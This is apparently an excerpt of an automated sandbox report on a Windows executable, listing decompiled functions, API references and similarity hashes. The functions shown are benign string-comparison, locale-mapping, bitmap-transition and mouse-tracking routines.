0x00416127
0x0041612d
0x0041612d
0x00416125
0x0041614f
0x00000000
0x00416155

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004163E0,00000000,00020000,?,?,00000000), ref: 004160EF
LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 004160F8
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041610C
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416127
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416143
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 0041614F

Strings

InitCommonControlsEx, xrefs: 00416104
COMCTL32.DLL, xrefs: 004160E8, 004160EE, 004160F5

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction ID: 81bca5f6391c8e8793c086ec2d57317fbfa520992b7089d48771000b14303d3d
Opcode Fuzzy Hash: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction Fuzzy Hash: B6F0A436704322A783229F64ED4896F73A9EF947627460436F841E3211DF28DC4687AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD71, Relevance: 13.7, APIs: 9, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BD71(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x42f6e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x43a068; // 0x0
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E0040BFEE(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E0040BFEE(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x43a068; // 0x0
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x439efc; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00406830(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00406830(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x42f5cc, _t107, 0x42f5cc, _t107) == 0) {
						if(CompareStringA(0, 0, 0x42f5c8, _t107, 0x42f5c8, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x43a068 = 2;
							goto L5;
						}
					} else {
						 *0x43a068 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

0x0040bd74
0x0040bd76
0x0040bd7b
0x0040bd86
0x0040bd87
0x0040bd8e
0x0040bd94
0x0040bd99
0x0040bda1
0x0040bda2
0x0040bde4
0x0040bde4
0x0040bde9
0x0040bdef
0x0040bdf5
0x0040bdf6
0x0040bdf8
0x0040bdf8
0x0040bdfe
0x0040be06
0x0040be0c
0x0040be0d
0x0040be0d
0x0040be10
0x0040be18
0x0040be37
0x00000000
0x0040be3d
0x0040be40
0x0040be42
0x0040be47
0x0040be47
0x0040be4c
0x0040be5a
0x0040be67
0x0040be72
0x0040beb5
0x0040beb5
0x00000000
0x0040be74
0x0040be83
0x00000000
0x0040be89
0x0040be8b
0x0040bebc
0x00000000
0x0040bebe
0x0040bec2
0x0040bec4
0x0040beca
0x0040becc
0x0040becc
0x0040bed1
0x00000000
0x00000000
0x0040bed6
0x0040beda
0x0040bee5
0x0040bee8
0x00000000
0x0040beea
0x00000000
0x0040beea
0x00000000
0x00000000
0x00000000
0x00000000
0x0040beda
0x0040becc
0x0040beca
0x00000000
0x0040bec2
0x0040be8d
0x0040be91
0x0040be93
0x0040be99
0x0040be9b
0x0040be9b
0x0040bea0
0x00000000
0x00000000
0x0040bea5
0x0040bea9
0x0040beb0
0x0040beb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bea9
0x0040be9b
0x0040be99
0x00000000
0x00000000
0x0040be91
0x0040be8b
0x0040be83
0x0040be69
0x0040be69
0x0040be69
0x0040be69
0x0040be5c
0x0040be5c
0x0040be5c
0x0040be5e
0x0040be5e
0x0040be5e
0x0040beef
0x0040beef
0x0040befa
0x0040bf00
0x0040bf05
0x00000000
0x0040bf0b
0x0040bf0b
0x0040bf15
0x0040bf1a
0x0040bf1f
0x0040bf22
0x0040bf41
0x00000000
0x0040bf61
0x0040bf70
0x0040bf72
0x0040bf77
0x00000000
0x0040bf79
0x0040bf79
0x0040bf84
0x0040bf89
0x0040bf8c
0x0040bf8e
0x0040bf91
0x0040bfab
0x00000000
0x0040bfc4
0x0040bfd2
0x0040bfd2
0x0040bfab
0x0040bf77
0x0040bf41
0x0040bf05
0x0040be4c
0x0040be1a
0x0040be2a
0x0040be2a
0x0040bda4
0x0040bdb7
0x0040bdd4
0x0040bfda
0x0040bfda
0x0040bdda
0x0040bdda
0x00000000
0x0040bdda
0x0040bdb9
0x0040bdb9
0x00000000
0x0040bdb9
0x0040bdb7
0x0040bfdc
0x0040bfe2
0x0040bfed
0x00000000

APIs

CompareStringW.KERNEL32(00000000,00000000,0042F5CC,00000001,0042F5CC,00000001,00000000,02270E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BDAF
CompareStringA.KERNEL32(00000000,00000000,0042F5C8,00000001,0042F5C8,00000001,?,0040A577), ref: 0040BDCC
CompareStringA.KERNEL32(?,?,00000000,0040A577,?,0000000B,00000000,02270E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BE2A
GetCPInfo.KERNEL32(0000000B,00000000,00000000,02270E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577), ref: 0040BE7B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,0040A577), ref: 0040BEFA
MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction ID: 15593673328f6da1faa78daf279323c0e4ae83b25398234663969b267ace6320
Opcode Fuzzy Hash: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction Fuzzy Hash: 3971783290024AAFDF219F54DC859EB7BBAEB05344F14413BFA51B22A0D7398851DBED

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEA, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00409DEA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x42f5d0);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x439ee0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040BFEE(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x439ee0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x439efc; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406830(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00406830(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x42f5cc, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x42f5c8, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x439ee0 = 2;
							goto L5;
						}
					} else {
						 *0x439ee0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x00409ded
0x00409def
0x00409df4
0x00409dff
0x00409e00
0x00409e07
0x00409e0d
0x00409e12
0x00409e18
0x00409e60
0x00409e63
0x00409e6b
0x00409e71
0x00409e72
0x00409e72
0x00409e75
0x00409e7d
0x00409e9f
0x00000000
0x00409ea5
0x00409ea8
0x00409eaa
0x00409eaf
0x00409eaf
0x00409ebf
0x00409ecf
0x00409ed1
0x00409ed6
0x00000000
0x00409edc
0x00409edc
0x00409ee7
0x00409eec
0x00409ef1
0x00409ef4
0x00409f10
0x00000000
0x00409f2b
0x00409f3d
0x00409f3f
0x00409f44
0x00000000
0x00409f46
0x00409f4a
0x00409f8c
0x00409f9b
0x00409fa0
0x00409fa3
0x00409fa5
0x00409fa8
0x00409fc2
0x00000000
0x00409fdc
0x00409fdf
0x00409fe0
0x00409fe1
0x00409fe7
0x00409fea
0x00409fe3
0x00409fe3
0x00409fe4
0x00409fe4
0x00409ffd
0x0040a001
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a001
0x00409f4c
0x00409f4f
0x0040a007
0x0040a007
0x00000000
0x00000000
0x00000000
0x00409f4f
0x00409f4a
0x00409f44
0x00409f10
0x00409ed6
0x00409e7f
0x00409e91
0x00409e91
0x00409e1a
0x00409e1a
0x00409e1b
0x00409e1e
0x00409e34
0x00409e50
0x00409f78
0x00409f78
0x00409e56
0x00409e56
0x00000000
0x00409e56
0x00409e36
0x00409e36
0x00000000
0x00409e36
0x00409e34
0x00409f80
0x00409f8b

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F5CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E2C
LCMapStringA.KERNEL32(00000000,00000100,0042F5C8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E48
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E91
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409EC9
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F21
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F37
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F6A
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409FD2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction ID: 2f12d8ec06d9f8176a5bc05fe246616eea55ae1664675450d96905dac16d2820
Opcode Fuzzy Hash: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction Fuzzy Hash: EA515D3190020ABBCF218F54CC49EEF7BB5FB45794F10412AF915A22E1D3399D61DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404577, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404577(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, _a28 - (_v12 + 1) * _a40, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20 + _a28 - (_v12 + 1) * _a40, _a24, (_v12 + 1) * _a40, _a32, _v8, _a28 - (_v12 + 1) * _a40, 0, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x00404587
0x0040459c
0x004045a7
0x004045ce
0x004045d4
0x004045e6
0x004045e9
0x004045f3
0x00000000
0x00000000
0x00404637
0x00404682
0x0040468c
0x00404691
0x004045e3
0x004045e3
0x004046be
0x004046c8
0x004046d2
0x004046dd

APIs

CreateCompatibleDC.GDI32(?), ref: 00404581
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404596
SelectObject.GDI32(?,?), ref: 004045A7
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004045CE
StretchBlt.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00404637
BitBlt.GDI32(00000000,?,?,?,?,?,?,00000000,00CC0020), ref: 00404682
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004046BE
DeleteObject.GDI32(?), ref: 004046C8
DeleteDC.GDI32(?), ref: 004046D2

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction ID: a75907197356ce4ca66e83fb1b854f5ba4b4597ff605ca05275262f1e745a3b8
Opcode Fuzzy Hash: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction Fuzzy Hash: 7F51A5B6600109AFCB04CF98DD95EEE77B9FF8C348F118258FA09A7254D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404816, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404816(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24 + _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _v8, 0, _a32 - (_v12 + 1) * _a40, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x00404826
0x0040483b
0x00404846
0x0040486d
0x00404873
0x00404885
0x00404888
0x00404892
0x00000000
0x00000000
0x004048d6
0x00404921
0x0040492b
0x00404930
0x00404882
0x00404882
0x0040495d
0x00404967
0x00404971
0x0040497c

APIs

CreateCompatibleDC.GDI32(?), ref: 00404820
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404835
SelectObject.GDI32(?,?), ref: 00404846
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040486D
StretchBlt.GDI32(?,00000000,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004048D6
BitBlt.GDI32(?,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00404921
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 0040495D
DeleteObject.GDI32(?), ref: 00404967
DeleteDC.GDI32(?), ref: 00404971

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction ID: 1794ec46a4d52dcc5cb24ae7db09ad2764e7e5e2d0b87eeeb5bcffab36add2c1
Opcode Fuzzy Hash: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction Fuzzy Hash: 375198B6600109AFCB04CF98D995EEE77B9FF8C344F158258FA09A7254C635ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E758, Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041E758(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t83;
				struct HWND__* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t88;

				_t87 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					L31:
					return _t42;
				}
				_t83 = E004249C4();
				_v12 = _t83;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t87 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
					L16:
					if(_v8 < 0) {
						L25:
						if( *(_v12 + 0x104) == 0xffffffff) {
							KillTimer( *(_t87 + 0x1c), 0xe001);
						}
						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
						L28:
						_t42 = 0xe000;
						if(_a4 != 0xe000) {
							goto L31;
						}
						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
						if(_v8 < 0) {
							goto L31;
						}
						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
					}
					ClientToScreen( *(_t87 + 0x1c),  &_v20);
					_push(_v20.y);
					_t85 = WindowFromPoint(_v20);
					if(_t85 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							goto L28;
						}
						goto L25;
					}
					_t60 =  *(_t87 + 0x1c);
					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t85) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
				_t72 = E00414CEF(_t87);
				if(E00414D5B(_t87) == 0 || E004166B3(_t72) == 0) {
					_v8 = _v8 | 0xffffffff;
				}
				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
				if(_t66 != 0) {
					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
				} else {
					_t86 = 0;
				}
				_t68 = E00413740(_t88, GetCapture());
				if(_t68 != _t87) {
					if(_t68 != 0) {
						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
					} else {
						_t81 = 0;
					}
					if(_t81 != _t86 && E00414CEF(_t68) == _t72) {
						_v8 = _v8 | 0xffffffff;
					}
				}
				goto L16;
			}

0x0041e760
0x0041e764
0x0041e76d
0x0041e8c5
0x0041e8c5
0x0041e8c5
0x0041e779
0x0041e77f
0x0041e782
0x0041e78f
0x0041e7a1
0x0041e7a6
0x0041e7a9
0x0041e80f
0x0041e816
0x0041e820
0x0041e87c
0x0041e886
0x0041e890
0x0041e890
0x0041e898
0x0041e89e
0x0041e89e
0x0041e8a7
0x00000000
0x00000000
0x0041e8ad
0x0041e8b3
0x00000000
0x00000000
0x00000000
0x0041e8bc
0x0041e829
0x0041e82f
0x0041e83b
0x0041e83f
0x0041e868
0x0041e868
0x0041e86b
0x0041e86f
0x0041e876
0x0041e87a
0x00000000
0x00000000
0x00000000
0x0041e87a
0x0041e841
0x0041e846
0x00000000
0x0041e854
0x0041e857
0x0041e85f
0x0041e861
0x0041e861
0x0041e866
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e866
0x0041e846
0x0041e7b4
0x0041e7bd
0x0041e7ca
0x0041e7ca
0x0041e7ce
0x0041e7d6
0x0041e7dc
0x0041e7d8
0x0041e7d8
0x0041e7d8
0x0041e7e6
0x0041e7ed
0x0041e7f1
0x0041e7f7
0x0041e7f3
0x0041e7f3
0x0041e7f3
0x0041e7fc
0x0041e809
0x0041e809
0x0041e7fc
